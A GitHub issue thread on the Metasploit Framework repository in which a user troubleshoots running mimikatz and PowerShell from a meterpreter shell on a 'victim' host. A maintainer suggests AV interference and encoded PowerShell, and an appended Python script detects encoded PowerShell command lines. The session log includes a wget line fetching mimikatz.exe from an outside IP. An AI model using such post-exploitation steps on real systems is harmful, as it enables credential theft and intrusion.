rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Unable to execute any other exe after I enter shell in meterpreter sessions #11097

Closed stevenfonz closed 4 years ago

stevenfonz commented 5 years ago

Steps to reproduce

How'd you do it?

  1. After I received the meterpreter session, I entered `shell` to obtain a shell on the victim, then I tried to execute other PEs such as mimikatz.exe, powershell.exe, etc. No output was returned.
  2. ...

This section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions.

Expected behavior

Should be able to execute mimikatz.exe and powershell.exe in the shell session.

What should happen?

Current behavior

```
meterpreter > shell
Process 880 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\spee>powershell
powershell
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

wget http://121.121.42.75:1080/mimikatz.exe
ipconfig
```

What happens instead?

You might also want to check the last ~1k lines of `/opt/metasploit/apps/pro/engine/config/logs/framework.log` or `~/.msf4/logs/framework.log` for relevant stack traces

System stuff

Metasploit version

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

Framework: 4.17.14-dev
Console : 4.17.14-dev

I installed Metasploit with:

- [ ] Kali package via apt

OS

What OS are you running Metasploit on?

Kali Linux

fsacer commented 5 years ago

Sounds like AV detected your payload, which is not a framework issue. Running interactive commands via shell also won't work well, as shell isn't meant for that. To execute PowerShell commands you should consider the powershell extension or just executing PowerShell in a noninteractive way, i.e. `powershell -command` or `powershell -encodedcommand`.
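
For defenders reading this thread: the noninteractive `powershell -encodedcommand` form mentioned above appears in process-creation logs as Base64 over UTF-16LE text. The following is an added example, not part of the issue thread or of Metasploit; the command lines are constructed samples, the function names are hypothetical, and the whitespace tokenizer assumes an image path without spaces.

```python
import base64
import ntpath

POWERSHELL_IMAGES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}

def _b64(script):
    # -EncodedCommand expects Base64 over the UTF-16LE bytes of the script text.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines, as they might appear in process-creation logs.
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -EncodedCommand " + _b64("Get-Process"),
    "powershell -nop -w hidden -enc " + _b64("ipconfig /all"),
    "powershell.exe -Command Get-Date",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\job.ps1",
    "powershell -e not_base64!!",
]

def is_encoded_flag(token):
    """True for -EncodedCommand, its -ec alias, or any prefix (-e, -enc, ...)."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ec" or "encodedcommand".startswith(name)

def find_encoded_command(cmdline):
    """Return None if there is no encoded PowerShell command, else a result dict."""
    tokens = cmdline.split()
    if not tokens or ntpath.basename(tokens[0].strip('"')).lower() not in POWERSHELL_IMAGES:
        return None
    for i, tok in enumerate(tokens[1:], start=1):
        name = tok[1:].lower() if tok[:1] in ("-", "/") else ""
        if name and ("command".startswith(name) or "file".startswith(name)):
            return None  # everything after -Command / -File belongs to the script
        if is_encoded_flag(tok):
            value = tokens[i + 1].strip("\"'") if i + 1 < len(tokens) else ""
            if not value:
                return {"flag": tok, "decoded": None, "error": "missing value"}
            try:
                raw = base64.b64decode(value, validate=True)
                return {"flag": tok, "decoded": raw.decode("utf-16-le"), "error": None}
            except ValueError as exc:  # bad Base64 or invalid UTF-16LE
                return {"flag": tok, "decoded": None, "error": str(exc)}
    return None

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(find_encoded_command(line), "<-", line[:60])
```

An entry with `decoded` set to `None` and an `error` is still worth reviewing, since the flag was present but its value did not decode cleanly.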